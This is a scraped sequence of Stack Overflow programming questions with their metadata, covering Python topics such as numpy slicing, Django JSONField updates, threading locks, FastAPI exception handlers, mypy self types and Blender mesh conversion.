if platform.system() == 'Windows': #colorama.just_fix_windows_console() if platform.python_implementation() == 'PyPy': if sys.pypy_version_info &gt; (7, 3, 15): import warnings warnings.warn(&quot;Applying workaround for https://github.com/pypy/pypy/issues/2999&quot;) chcp_output = subprocess.check_output(['chcp.com'], encoding='ascii') cur_codepage = int(re.match(r'Active code page: (\d+)', chcp_output).group(1)) cur_encoding = WINDOWS_CODEPAGES[cur_codepage] for f in [sys.stdin, sys.stdout, sys.stderr]: if f.encoding != cur_encoding: f.reconfigure(encoding=cur_encoding) WINDOWS_CODEPAGES = { 437: 'ibm437', 850: 'ibm850', 1252: 'windows-1252', 28591: 'iso-8859-1', 28592: 'iso-8859-2', 28593: 'iso-8859-3', 65000: 'utf-7', 65001: 'utf-8' } </code></pre> <p>Now, it seems to me that calling <code>sys.stdout.reconfigure(encoding=sys.stdout._TTY_CODEPAGE)</code> whenever <code>sys.stdout.encoding != sys.stdout._TTY_CODEPAGE</code> is a <strong>very sane and correct thing to do</strong>.</p>
<python><character-encoding><future-proof>
2024-01-12 19:36:31
2
1,117
JamesTheAwesomeDude
77,808,731
5,036,928
NumPy Get elements based on starting indices and stride
<p>I am looking for the numpythonic way to accomplish the following:</p> <pre><code>A = np.arange(1000) x = np.array([0, 10, 20, 30], dtype=int) dx = np.array([3, 4, 5, 6], dtype=int) for x_, dx_ in zip(x, dx): print(A[x_:x_+dx_]) </code></pre> <p>Looking at <a href="https://stackoverflow.com/questions/48920850/how-can-i-extract-multiple-random-sub-sequences-from-a-numpy-array?noredirect=1&amp;lq=1">similar answers</a> and the <a href="https://numpy.org/doc/stable/reference/generated/numpy.lib.stride_tricks.as_strided.html" rel="nofollow noreferrer">as_strided documentation</a> it doesn't seem like I can provide varying stride/window lengths. Is there a pure numpy way to accomplish this?</p>
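One way to vectorize variable-length windows (a sketch of a common idiom, not the only option): build a single flat index array with `repeat`/`cumsum`, gather once, then split back into the ragged pieces.

```python
import numpy as np

A = np.arange(1000)
x = np.array([0, 10, 20, 30])
dx = np.array([3, 4, 5, 6])

stops = dx.cumsum()                        # flat end offset of each window
starts = stops - dx                        # flat start offset of each window
# position of each element inside its window, shifted by that window's x
flat = np.arange(stops[-1]) - np.repeat(starts, dx) + np.repeat(x, dx)
gathered = A[flat]                         # all windows, concatenated
windows = np.split(gathered, stops[:-1])   # ragged pieces, if needed separately
for w in windows:
    print(w)
```

This trades the Python loop for one fancy-indexing pass; `as_strided` genuinely cannot express ragged windows, so a gather like this (or `np.concatenate` of `np.arange` calls) is the usual substitute.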
<python><numpy><numpy-slicing>
2024-01-12 18:51:57
1
1,195
Sterling Butters
77,808,666
11,357,623
nested directories and classes in a python library
<h1>Efficient Imports</h1> <p>I have several nested directories in this library I'm building, some nested directories have no files but other directories, or each directory has one or more class files.</p> <p>The library is basically getting ported from another language, and I have to keep the structure same.</p> <p>I'm looking for code organization and module access without repetition in the import statements</p> <pre><code>mylib ├── foo │ ├── bar │ └── baz.py (class Baz) ├ test ── foo ├── bar ── test_baz.py </code></pre> <p>The problem I have is with the repetition in my import statement</p> <p><code>from mylib.foo.bar.baz import Baz</code></p> <p>is there a way I can avoid <code>.baz</code> in the import statement?</p> <h2>Attempt (without any real success)</h2> <p>within the <code>__init__</code> file, I tried without any real effect.</p> <pre><code>import baz.baz import Baz __all__ = [ &quot;Baz&quot; ] </code></pre>
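The usual fix is to re-export `Baz` from `mylib/foo/bar/__init__.py` with a *relative* import, so callers can drop the trailing `.baz`. The sketch below builds a throwaway copy of that layout in a temp directory so it is self-contained; the file contents are the part that transfers to the real project.

```python
import importlib
import os
import sys
import tempfile

root = tempfile.mkdtemp()
pkg = os.path.join(root, "mylib", "foo", "bar")
os.makedirs(pkg)
open(os.path.join(root, "mylib", "__init__.py"), "w").close()
open(os.path.join(root, "mylib", "foo", "__init__.py"), "w").close()
with open(os.path.join(pkg, "baz.py"), "w") as f:
    f.write("class Baz:\n    pass\n")
# The key file: re-export Baz from the subpackage's __init__.py.
# Note the relative `from .baz import Baz`, not `import baz.baz`.
with open(os.path.join(pkg, "__init__.py"), "w") as f:
    f.write("from .baz import Baz\n__all__ = ['Baz']\n")

sys.path.insert(0, root)
importlib.invalidate_caches()
from mylib.foo.bar import Baz   # no trailing .baz needed

print(Baz)
```

The attempt in the question fails because `import baz.baz import Baz` is not valid syntax and, inside a package, `baz` must be imported relatively (`from .baz import Baz`).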
<python>
2024-01-12 18:39:11
1
2,180
AppDeveloper
77,808,612
7,648,377
Python test fail while function works in isolation
<p>This is the function</p> <pre><code>def update_content_if_reusable(content_data): &quot;&quot;&quot; Add reusable counter &quot;&quot;&quot; content = json.loads(content_data) if 'layouts' in content: for layout in content['layouts'].values(): if 'isReusable' in layout: content['reusableBlocks'] += 1 return json.dumps(content, indent=4) </code></pre> <p>The error in test</p> <pre><code>_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ content_data = '&quot;{\\n \\&quot;page\\&quot;: {\\n \\&quot;layouts\\&quot;: []\\n },\\n \\&quot;reusableBlocks\\&quot;: 0,\\n \\&quot;layouts\\&quot;: {},\\n \\&quot;columns\\&quot;: {},\\n \\&quot;components\\&quot;: {}\\n}&quot;' def update_content_if_reusable(content_data): &quot;&quot;&quot; Add reusable counter &quot;&quot;&quot; content = json.loads(content_data) if 'layouts' in content: &gt; for layout in content['layouts'].values(): E TypeError: string indices must be integers models.py:82: TypeError </code></pre> <p>The python version is 3.6</p> <p><a href="https://www.online-python.com/5VH28jsWYQ" rel="nofollow noreferrer">https://www.online-python.com/5VH28jsWYQ</a></p>
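The `content_data` in the traceback is a JSON string that itself *encodes* a JSON document (note the escaped quotes), so a single `json.loads` returns a `str`, not a `dict` — and indexing that string with `'layouts'` is what raises `string indices must be integers` on 3.6. A small sketch reproducing the situation and one defensive way to handle it (decoding until a non-string appears is my suggestion, not necessarily the right fix for the test fixture):

```python
import json

inner = {"layouts": {}, "reusableBlocks": 0}
double_encoded = json.dumps(json.dumps(inner))  # what the failing test passes in

once = json.loads(double_encoded)
print(type(once).__name__)   # str — so content['layouts'] indexes a string

# Defensive decode: keep unwrapping while we still have a JSON-encoded string.
content = double_encoded
while isinstance(content, str):
    content = json.loads(content)
print(type(content).__name__)  # dict
```

The cleaner fix is usually upstream: make the test pass `json.dumps(inner)` once, not twice.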
<python>
2024-01-12 18:29:48
1
2,762
Andrei Lupuleasa
77,808,549
711,855
Shared variable & threading.Lock
<p>In Java, unless you use atomic operations or some other thread sync mechanism, you might have stalled values for a shared variable in a thread.</p> <p>Given the GIL, in CPython. I see the value of a Lock inc cases where: Multiple steps are taken before assigning a value, even in the confusing <code>a += 1</code> idiom. To prevent race condition.</p> <p>But in a case like <code>a = 1</code>, without a Lock. is it possible to have threads A and B reading different values of a after some thread updated it?</p> <p>Another way of asking this question would be, does Lock ensures shared value propagation and lack of Lock does not?</p>
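In CPython a plain assignment to a shared name is a single bytecode-level store executed under the GIL, and synchronization points such as `Thread.join()` (or acquiring any lock) are enough for the main thread to observe it — there is no per-thread cache of stale Python object references the way there can be for Java fields without `volatile`. A minimal sketch (it demonstrates visibility after `join()`; it does not prove anything about racy read-while-write interleavings, and other implementations or free-threaded builds may have their own rules):

```python
import threading

shared = {"a": 0}

def writer():
    shared["a"] = 1   # plain assignment, no Lock

t = threading.Thread(target=writer)
t.start()
t.join()              # join() is itself a synchronization point
print(shared["a"])    # 1 — the write is visible in the main thread
```

So the Lock's job in CPython is atomicity of multi-step updates (`a += 1`), not value propagation.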
<python><multithreading><synchronization><locking>
2024-01-12 18:15:12
1
2,004
juanmf
77,808,548
8,022,306
How to use Django's ORM to update the value for multiple keys in a JsonField using .update() method?
<p>I have a model field I am trying to update using Django's <code>.update()</code> method. This field is a JsonField. I am typically saving a dictionary in this field. e.g. <code>{&quot;test&quot;: &quot;yes&quot;, &quot;prod&quot;: &quot;no&quot;}</code></p> <p>Here is the model:</p> <pre><code>class Question(models.Model): # {&quot;test&quot;: &quot;yes&quot;, &quot;prod&quot;: &quot;no&quot;} extra_data = models.JSONField(default=dict, null=True, blank=True) </code></pre> <p>I am able to update a key inside the dictionary using this query (which works fine by the way):</p> <pre><code>Question.filter(id=&quot;123&quot;).update(meta_data=Func( F(&quot;extra_data&quot;), Value([&quot;test&quot;]), Value(&quot;no&quot;, JSONField()), function=&quot;jsonb_set&quot;, )) </code></pre> <p>The question now is, is there a way I can update the multiple keys at once(in my own case, two) using the <code>.update()</code> as shown in the above query?</p> <p>I want to use the <code>.update()</code> method instead of <code>.save()</code> to achieve this so I can avoid calling a post_save signal function.</p>
<python><django>
2024-01-12 18:14:56
2
422
Toluwalemi
77,808,447
2,142,728
Where is the selected Python interpreter path stored in Visual Studio Code (workspace)?
<p>I am using Visual Studio Code for my Python development, and I can select the Python interpreter through the UI by using cmd + shift + p and then choosing Python: Select interpreter.</p> <p>I've checked the <code>&lt;project&gt;/.vscode/settings.json</code> file, but I couldn't find the information about the selected Python interpreter there (it's actually empty <code>{}</code>). Can someone please guide me on where Visual Studio Code stores the information about the selected Python interpreter? I would like to know the location of this setting, as I'm working with multiple projects in a monorepo, and the interpreter/venv seems to be automatically activated whenever I open the terminal. But sometimes the wrong one is picked. Pretty annoying</p> <p>Your help is much appreciated!</p>
<python><visual-studio-code><python-poetry>
2024-01-12 17:52:27
0
3,774
caeus
77,808,398
10,155,763
ECS Scheduled Task Start and End Time
<p>How do i get the start and end time of an ECS scheduled task using CLI or SDK?</p> <pre><code>aws events describe-rule </code></pre> <p>only provides basic information with no start and end time.</p>
<python><amazon-ecs><aws-fargate><aws-event-bridge>
2024-01-12 17:41:46
1
325
manoman687
77,808,349
4,506,929
How do I call Python scripts from within a Python script such that the hierarchy information is always retained?
<p>I'd like to run a few scripts within a script such that</p> <ol> <li>Know when a script is being called from another script and when it's run directly</li> <li>Be able to get information/variables from the parent script into the child script.</li> </ol> <p>Here's an illustration of what I mean. Say I have files <code>mwe1.py</code> and <code>mwe2.py</code> with only one line of code:</p> <pre class="lang-py prettyprint-override"><code>print(__name__) </code></pre> <p>And say I have another script (<code>mwe0.py</code>) with:</p> <pre class="lang-py prettyprint-override"><code>print(__name__) exec(open(&quot;mwe1.py&quot;).read()) exec(open(&quot;mwe2.py&quot;).read()) </code></pre> <p>If I run <code>mwe0.py</code> all the code runs, but the hierarchy isn't preserved and (I think) I have no way of knowing from within <code>mwe1.py</code> that it was called by another script:</p> <pre class="lang-py prettyprint-override"><code>In [4]: %run mwe0.py __main__ __main__ __main__ </code></pre> <p>But maybe there's a better way to get hierarchy information than just <code>__main__</code>? Is there a way to do what I want?</p>
<python><ipython>
2024-01-12 17:30:14
1
3,547
TomCho
77,808,303
6,817,610
Property decorator without object attribute
<p>I have a class like this that contains property but doesn't have corresponding attribute:</p> <pre><code>class Example(object): def __init__(self, csv_dict): self._csv_dict = csv_dict @property def name(self): return self[&quot;name&quot;] @property def number(self): try: return round(float(self[&quot;number&quot;]), 2) except ValueError: return None def __getitem__(self, field_name): value = self._csv_dict.get(field_name) if value: value = value.strip() return value </code></pre> <p>I'm trying to modify number but I can't seem to set it. Tried this:</p> <pre><code>example.number.setter(5) </code></pre> <p>this:</p> <pre><code>@number.setter def number(self, new_number): self._number = new_number # and this self.number = new_number example.number = 5 </code></pre> <p>Getting these errors:</p> <pre class="lang-none prettyprint-override"><code>AttributeError: 'float' object has no attribute 'setter AtributeError: can't set attribute </code></pre>
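For the property to become settable, the setter has to be defined on the *class* (not called on the instance's value), and it must write to a private attribute rather than `self.number`, which would recurse. A sketch of one way the class might be amended — the "explicit override beats the CSV value" behavior is a design choice, not the only option:

```python
class Example:
    def __init__(self, csv_dict):
        self._csv_dict = csv_dict
        self._number = None          # backing slot for the setter

    @property
    def number(self):
        if self._number is not None:  # an explicit override wins
            return self._number
        try:
            return round(float(self["number"]), 2)
        except (TypeError, ValueError):
            return None

    @number.setter
    def number(self, new_number):
        self._number = new_number    # write the backing attribute, NOT self.number

    def __getitem__(self, field_name):
        value = self._csv_dict.get(field_name)
        return value.strip() if value else value

e = Example({"number": "3.14159"})
print(e.number)   # 3.14
e.number = 5
print(e.number)   # 5
```

The two original errors make sense in this light: `example.number.setter(5)` calls `.setter` on the returned `float`, and assigning to a getter-only property raises `can't set attribute`.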
<python><class><object>
2024-01-12 17:21:59
1
953
Anton Kim
77,808,253
1,473,517
How to replace Counter to use numpy code only
<p>I have this code:</p> <pre><code>from collections import Counter import numpy as np def make_data(N): np.random.seed(40) g = np.random.randint(-3, 4, (N, N)) return g N = 100 g = make_data(N) n = g.shape[0] sum_dist = Counter() for i in range(n): for j in range(n): dist = i**2 + j**2 sum_dist[dist] += g[i, j] sorted_dists = sorted(sum_dist.keys()) for i in range(1, len(sorted_dists)): sum_dist[sorted_dists[i]] += sum_dist[sorted_dists[i-1]] # print(sum_dist) print(max(sum_dist, key=sum_dist.get)) </code></pre> <p>The output is 7921.</p> <p>I want to convert it into numpy only code and get rid of Counter. How can I do that?</p>
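A possible numpy-only version (one approach among several): `np.bincount` with `weights` sums `g` over equal `i**2 + j**2` in a single call, and a cumulative sum over the sorted unique distances replaces the second loop. Note `argmax` breaks ties by the smallest distance, which matches the original only when the maximum is unique:

```python
import numpy as np

def make_data(N):
    np.random.seed(40)
    return np.random.randint(-3, 4, (N, N))

N = 100
g = make_data(N)
i, j = np.indices(g.shape)
dist = (i**2 + j**2).ravel()

# bincount with weights sums g over equal distances in one shot
sums = np.bincount(dist, weights=g.ravel())
present = np.flatnonzero(np.bincount(dist))   # distances that actually occur
running = np.cumsum(sums[present])            # cumulative sums in sorted order
best = present[np.argmax(running)]
print(best)
```

`bincount` allocates an array up to `dist.max()+1`, so for very large `N` a `np.unique(..., return_inverse=True)` grouping would be more memory-friendly.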
<python><numpy>
2024-01-12 17:12:41
1
21,513
Simd
77,808,226
10,645,965
Pydantic: pass the entire dataset to a nested field
<p>I am using django, django-ninja framework to replace some of my apis ( written in drf, as it is becoming more like a boilerplate codebase ). Now while transforming some legacy api, I need to follow the old structure, so the client side doesn't face any issue. This is just the backstory.</p> <p>I have two separate models.</p> <pre class="lang-py prettyprint-override"><code>class Author(models.Model): username = models.CharField(...) email = models.CharField(...) ... # Other fields class Blog(models.Model): title = models.CharField(...) text = models.CharField(...) tags = models.CharField(...) author = models.ForeignKey(...) ... # Other fields </code></pre> <p>The structure written in django rest framework serializer</p> <pre><code>class BlogBaseSerializer(serializers.Serializer): class Meta: model = Blog exclude = [&quot;author&quot;] class AuthorSerializer(serializers.Serializer): class Meta: model = Author fields = &quot;__all__&quot; class BlogSerializer(serializers.Serializer): blog = BlogBaseSerializer(source=&quot;*&quot;) author = AuthorSerializer() </code></pre> <p>In viewset the following queryset will be passed</p> <pre><code>class BlogViewSet(viewsets.GenericViewSet, ListViewMixin): queryset = Blog.objects.all() serializer_class = BlogSerializer ... # Other config </code></pre> <p>So, as I am switching to django-ninja which uses pydantic for schema generation. I have the following code for pydantic schema</p> <pre><code>AuthorSchema = create_schema(Author, exclude=[&quot;updated&quot;, &quot;date_joined&quot;]) class BlogBaseSchema(ModelSchema): class Meta: model = Blog exclude = [&quot;author&quot;, ] class BlogSchema(Schema): blog: BlogBaseSchema author: AuthorSchema </code></pre> <p>But as you can see, drf serializer has a parameter called <code>source</code>, where <code>source=&quot;*&quot;</code> means to pass the entire original dataset to the nested field serializer. 
Is there any option to do the exact same with pydantic?</p> <p>Except for creating a list of dictionaries [{author: blog.author, &quot;blog&quot;: blog} for blog in queryset]</p>
<python><django><django-rest-framework><pydantic><django-ninja>
2024-01-12 17:09:08
1
691
Khan Asfi Reza
77,808,185
7,675,202
Importing locally created package in python installed from Pipfile not detected
<p>I created a package folder parallel to my apps folder, where my packages folder will have shared/reusable code that'll be used across different apps and probably published, but before then I need to test it and use it locally.</p> <p>This is my Pipfile for my mobile folder:</p> <pre><code>[packages] pronto_auth = {editable = true, path = &quot;../../packages/auth&quot;} pronto_apis = {editable = true, path = &quot;../../packages/apis&quot;} flet = &quot;*&quot; </code></pre> <p>Not sure why, but my lock file looks like this when I've imported with &quot;_&quot; and not &quot;-&quot;</p> <pre><code>&quot;pronto-apis&quot;: { &quot;editable&quot;: true, &quot;path&quot;: &quot;../../packages/apis&quot; }, &quot;pronto-auth&quot;: { &quot;editable&quot;: true, &quot;path&quot;: &quot;../../packages/auth&quot; }, </code></pre> <p>Yes, it does install successfully.</p> <p>The pronto_auth and apis folders get installed, but I can't seem to import them. I get the following error:</p> <p><code>Import &quot;pronto_apis.apis.main.src.main&quot; could not be resolved</code></p> <p>This is how I'm trying to import:</p> <p><code>from pronto_apis.apis.main.src.main import add_two_numbers</code></p> <p>I don't want to import like this:</p> <p><code>from packages.apis.main.src.main import add_two_numbers</code></p> <p>because that defeats the purpose of a package-like import.</p> <p>This is what my folder structure and import look like:</p> <p><a href="https://i.sstatic.net/561Zz.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/561Zz.png" alt="enter image description here" /></a></p> <p>My setup file for both the api and auth looks like this:</p> <pre><code>from setuptools import setup, find_packages setup( name='pronto_apis', version='0.0.1', packages=find_packages(), description='A brief description of your package', install_requires=[], ) </code></pre>
<python>
2024-01-12 17:02:42
1
4,345
Mohamed Mohamed
77,807,760
10,816,965
Avoid SQL injection when creating user with SQLAlchemy Core
<p>When creating a user with <code>psycopg</code>, I would create the following composite in order to avoid SQL injection:</p> <pre><code>from psycopg.sql import SQL, Identifier, Literal username = &quot;test_user&quot; password = &quot;test_password&quot; query = SQL( &quot;CREATE USER {username} WITH ENCRYPTED PASSWORD {password};&quot; ).format(username=Identifier(username), password=Literal(password)) </code></pre> <p>This can be tested in the scope of a <code>psycopg.Connection</code>:</p> <pre><code>print(query.as_string(connection)) # CREATE USER &quot;test_user&quot; WITH ENCRYPTED PASSWORD 'test_password'; </code></pre> <p>What is the recommended way to do the same with <code>sqlalchemy</code>? I tried <code>quoted_name</code> and <code>bind_params</code>, but the former was not successful:</p> <pre><code>from sqlalchemy import quoted_name, text query = text( f&quot;CREATE USER {quoted_name(username, True)} WITH ENCRYPTED PASSWORD :password;&quot; ).bindparams(password=password).compile(compile_kwargs={&quot;literal_binds&quot;: True}) print(query) # CREATE USER test_user WITH ENCRYPTED PASSWORD 'test_password'; </code></pre> <p>(Changing the second parameter of <code>quoted_name</code> to <code>False</code> or <code>None</code> yields the same result.)</p>
<python><postgresql><sqlalchemy><psycopg3>
2024-01-12 15:51:16
0
605
Sebastian Thomas
77,807,681
2,611,159
Getting all values of an "enum" class of ctypes type
<p>I'm struggling to find all values or iterate over all values for an enum class found in an SDK I need to make use of. The enums are not the classical <code>Enum</code> that Python comes with, but are defined as</p> <pre><code>import ctypes import ctypes.utils XSULONG32 = ctypes.c_uint32 class XS_INFO(XSULONG32): XS_CONST0 = 0 XS_CONST1 = 1 XS_CONST2 = 2 </code></pre> <p>I have code where I'd like to access both the constant values found in these classes, and ideally also the constant names left of the equal sign.</p> <p>The intuitive approach of</p> <pre><code>for (name, value) in XS_INFO(): print(&quot;{}: {}&quot;.format(name, value)) </code></pre> <p>results in</p> <pre><code>TypeError: 'XS_INFO' object is not iterable </code></pre> <p>And similarly when trying other advice, e.g. the advice from <a href="https://stackoverflow.com/questions/29503339/how-to-get-all-values-from-python-enum-class">this question</a>:</p> <pre><code>[hscam.XS_INFO().value for value in hscam.XS_INFO()] TypeError: 'XS_INFO' object is not iterable [hscam.XS_INFO.value for value in hscam.XS_INFO] TypeError: '_ctypes.PyCSimpleType' object is not iterable </code></pre> <p>How can I iterate over all values of such an enum?</p>
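Because those constants are ordinary class attributes, `vars()` on the class exposes them; filtering out dunders and non-ints yields the name/value pairs. A sketch — the `isinstance(val, int)` filter assumes all enum members are plain ints, which holds for the SDK snippet shown but is worth checking against the real class:

```python
import ctypes

XSULONG32 = ctypes.c_uint32

class XS_INFO(XSULONG32):
    XS_CONST0 = 0
    XS_CONST1 = 1
    XS_CONST2 = 2

def enum_members(cls):
    # The constants live in the class dict, so vars() finds them;
    # drop dunders (__module__ etc.) and anything that isn't an int.
    return {name: val for name, val in vars(cls).items()
            if not name.startswith("_") and isinstance(val, int)}

for name, value in enum_members(XS_INFO).items():
    print(f"{name}: {value}")
```

Instantiating `XS_INFO()` gives a single ctypes value, not a container, which is why every attempt to iterate the instance (or the class) raises `TypeError`.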
<python><enums><ctypes>
2024-01-12 15:37:53
1
6,094
planetmaker
77,807,656
5,506,167
Why is it unsafe to use a generic self type in an argument?
<p>The <a href="https://mypy.readthedocs.io/en/stable/generics.html#generic-methods-and-generic-self" rel="nofollow noreferrer">mypy doc says</a>:</p> <blockquote> <p>Note that mypy lets you use generic self types in certain unsafe ways in order to support common idioms. For example, using a generic self type in an argument type is accepted even though it’s unsafe.</p> </blockquote> <p>It then mentions an example of using generic self type in an argument:</p> <pre class="lang-py prettyprint-override"><code>from typing import TypeVar T = TypeVar(&quot;T&quot;) class Base: def compare(self: T, other: T) -&gt; bool: return False class Sub(Base): def __init__(self, x: int) -&gt; None: self.x = x # This is unsafe (see below) but allowed because it's # a common pattern and rarely causes issues in practice. def compare(self, other: Sub) -&gt; bool: return self.x &gt; other.x b: Base = Sub(42) b.compare(Base()) # Runtime error here: 'Base' object has no attribute 'x' </code></pre> <p>I can't understand what the &quot;unsafe&quot; issue is here. The main problem is that the <code>b</code> variable is assigned a type that is not precise (<code>b: Base</code>).</p> <p>So what is the point in the doc?</p> <p>P.S.: The point of &quot;unsafe&quot; in the doc is that it type checks well but will produce an exception at runtime. But what I can't understand is why this is related to the annotation of <code>other: T</code> in <code>Base.compare</code>. I think it's due to the imprecise type of b that should have been cast to Sub by the developer.</p> <p>In other words: What should I do in case I have a method that accepts the same object type as <code>self</code> for its other arguments?</p>
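A plain-Python sketch of the runtime half of the doc's point (annotations stripped, since the failure is dynamic): the declared type of `b` is `Base`, so mypy checks the call against `compare(self: T, other: T)` with `T = Base` and accepts `b.compare(Base())`; but dynamic dispatch actually runs `Sub.compare`, which assumes `other` has `.x`. That mismatch — a signature the checker approved leading to an attribute error — is what "unsafe" means here:

```python
class Base:
    def compare(self, other):
        return False

class Sub(Base):
    def __init__(self, x):
        self.x = x
    def compare(self, other):
        return self.x > other.x   # assumes `other` is a Sub

b = Sub(42)            # statically annotated as Base in the doc's example
try:
    b.compare(Base())  # mypy accepts this call; CPython raises at runtime
except AttributeError as e:
    print("runtime failure:", e)
```

The safe alternatives are to accept the base type and check it (`isinstance(other, Sub)`) inside the override, or to make the class generic so the override's signature stays compatible with the base.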
<python><python-typing><mypy>
2024-01-12 15:33:02
1
1,962
Saleh
77,807,611
1,714,692
Proper index creation in mongodb timeseries collection
<p>I am trying to create indexes for a nested mongo db timeseries collection. My mongo db version, obtained by running <code>mongod --version</code>, is v3.6.8.</p> <p>The timeseries schema follows the <a href="https://www.mongodb.com/docs/manual/core/timeseries-collections/" rel="nofollow noreferrer">suggested one</a>.</p> <p>My collection has a schema like:</p> <pre><code>validator = { &quot;$jsonSchema&quot;: { &quot;bsonType&quot;: &quot;object&quot;, &quot;required&quot;: [&quot;timestamp&quot;, &quot;metadata&quot;, &quot;measurements&quot;], &quot;properties&quot;: { &quot;timestamp&quot;: { &quot;bsonType&quot;: &quot;long&quot;, }, &quot;metadata&quot;: { &quot;bsonType&quot;: &quot;object&quot;, &quot;required&quot;: [&quot;type&quot;, &quot;sensor_id&quot;], &quot;properties&quot;: { &quot;type&quot;: { &quot;bsonType&quot;: &quot;string&quot;, &quot;description&quot;: &quot;Measurement type&quot; }, &quot;sensor_id&quot;: { &quot;bsonType&quot;: &quot;string&quot;, &quot;description&quot;: &quot;sensor id&quot; } } }, &quot;measurement&quot;: { &quot;bsonType&quot;: &quot;array&quot;, &quot;description&quot;: &quot;must be an array and is required&quot;, &quot;items&quot;: { &quot;bsonType&quot;: &quot;double&quot;, &quot;description&quot;: &quot;must be array of float and is required&quot; }, &quot;minItems&quot;: 3, &quot;maxItems&quot;: 3, }, } } } </code></pre> <p>When using Mongo db compass to access the db, going to the <code>Index</code> page shows in red the message: <code>Unrecognized expression '$toDouble()'</code>: <a href="https://i.sstatic.net/QYKdN.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/QYKdN.png" alt="Error on MongoDb Compass" /></a></p> <p>I thought this happens because I have not defined any Index yet. 
So in Pymongo, I try to create Indexes of the nested fields <code>type</code> and <code>sensor_id</code> with the line:</p> <pre><code>mydb.mycollection.create_index( [ (&quot;attrs.nested.sensor_id&quot;, pymongo.ASCENDING), (&quot;attrs.nested.type&quot;, pymongo.ASCENDING) ]) </code></pre> <p>But the error message in MongoDB Compass keeps showing:</p> <ol> <li>how to solve this MongoDB Compass error</li> </ol> <p>Furthermore, I am not sure the indexes are correctly defined, because if I create a fake index like:</p> <pre><code>mydb.mycollection.create_index( [ (&quot;attrs.nested.unexisting_field&quot;, pymongo.ASCENDING), ]) </code></pre> <p>no error is generated although the specified field does not exist: 2) is there a way to check the index is correctly defined?</p>
<python><mongodb><indexing><pymongo><mongodb-compass>
2024-01-12 15:24:34
1
9,606
roschach
77,807,349
6,494,707
macro accuracy in scikit learn
<p>I am trying to calculate <code>macro accuracy</code>.</p> <p>If I set</p> <pre><code>from sklearn.metrics import precision_recall_fscore_support y_true=[2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2] y_pred=[2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 2, 2, 2, 2] print(precision_recall_fscore_support(y_true, y_pred,average='macro')) Output: (0.5, 0.4722222222222222, 0.4857142857142857, None) </code></pre> <p>will the output <code>recall</code> be equivalent to macro accuracy?</p> <p>How can I calculate macro accuracy with scikit-learn metrics?</p>
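With `average='macro'`, the middle number is macro-averaged recall, and that is what "macro accuracy" usually means (scikit-learn exposes a close relative as `balanced_accuracy_score`, though that averages only over classes present in `y_true`, so it can differ when `y_pred` invents a class). A dependency-free sketch reproducing the `0.4722…` above; note the label set is the union of `y_true` and `y_pred`, with recall taken as 0 for a class that never appears in `y_true` — which, as far as I can tell, mirrors what `precision_recall_fscore_support` does (with a warning):

```python
def macro_recall(y_true, y_pred):
    """Unweighted mean of per-class recall over all labels seen anywhere."""
    classes = sorted(set(y_true) | set(y_pred))
    recalls = []
    for c in classes:
        idx = [i for i, t in enumerate(y_true) if t == c]
        hits = sum(1 for i in idx if y_pred[i] == c)
        recalls.append(hits / len(idx) if idx else 0.0)  # 0 when class absent
    return sum(recalls) / len(recalls)

y_true = [2] * 18
y_pred = [2] * 13 + [0] + [2] * 4
print(macro_recall(y_true, y_pred))  # 0.4722222222222222
```

Here class 0 contributes recall 0 (it never occurs in `y_true`) and class 2 contributes 17/18, whose average is the 0.4722 in the question.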
<python><scikit-learn>
2024-01-12 14:42:15
1
2,236
S.EB
77,807,142
13,520,498
AttributeError: Calling operator "bpy.ops.import_scene.obj" error, could not be found
<p>I am trying to write a python script that will convert triangular-mesh objects to quad-mesh objects.</p> <p><a href="https://i.sstatic.net/mNB4W.png" rel="noreferrer"><img src="https://i.sstatic.net/mNB4W.png" alt="enter image description here" /></a></p> <p>For example, image (a) will be my input (<code>.obj/.stl</code>) file and image (b) will be the output.</p> <p>I am a noob with mesh-algorithms or how they work all together. So, far this is the script I have written:</p> <pre><code>import bpy inp = 'mushroom-shelve-1-merged.obj' # Load the triangle mesh OBJ file bpy.ops.import_scene.obj(filepath=inp, use_smooth_groups=False, use_image_search=False) # Get the imported mesh obj = bpy.context.selected_objects[0] # Convert triangles to quads # The `beauty` parameter can be set to False if desired bpy.ops.object.mode_set(mode='EDIT') bpy.ops.mesh.select_all(action='SELECT') bpy.ops.mesh.tris_convert_to_quads(beauty=True) bpy.ops.object.mode_set(mode='OBJECT') # Export to OBJ with quads bpy.ops.export_scene.obj(filepath='quad_mesh.obj') </code></pre> <p>This results in the following error:</p> <pre><code>Traceback (most recent call last): File &quot;/home/arrafi/mesh-convert-application/test.py&quot;, line 8, in &lt;module&gt; bpy.ops.import_scene.obj(filepath=inp, File &quot;/home/arrafi/mesh-convert-application/venv/lib/python3.10/site-packages/bpy/4.0/scripts/modules/bpy/ops.py&quot;, line 109, in __call__ ret = _op_call(self.idname_py(), kw) AttributeError: Calling operator &quot;bpy.ops.import_scene.obj&quot; error, could not be found </code></pre> <p>Any help with what I am doing wrong here would be greatly appreciated.</p> <ul> <li>Also please provide your suggestions for if you know any better way to convert triangular-mesh to quad-mesh with Python.</li> <li>If you guys know of any API that I can call with python to do the conversion, that would work too.</li> </ul>
<python><python-3.x><blender><stl-format><bpy>
2024-01-12 14:06:50
2
1,991
Musabbir Arrafi
77,807,054
5,764,661
FastAPI exception_handlers and mounted apps
<p>I have a FastAPI app :</p> <pre class="lang-py prettyprint-override"><code>app = FastAPI() </code></pre> <p>And several mounted apps.</p> <pre class="lang-py prettyprint-override"><code>app.mount(&quot;app_1&quot;, mounted_app_1) app.mount(&quot;app_2&quot;, mounted_app_1) # and so on </code></pre> <p>I defined an exception handler so that a certain class of errors are handled specifically</p> <pre class="lang-py prettyprint-override"><code>@app.exception_handler(ValidationError) async def request_validation_error_exception_handler( request: Request, exc: ValidationError ): return JSONResponse( status_code=422, content={&quot;message&quot;: &quot;validation error&quot;}, ) </code></pre> <p>But it does not seem to cascade on my mounted apps. I would like to avoid defining an exception handler on each of the mounted class. Is there a way to cascade this exception handler ?</p>
<python><exception><fastapi>
2024-01-12 13:49:06
0
301
William Pollet
77,806,959
1,652,219
How to run multiple dependent sql statements in sqlalchemy?
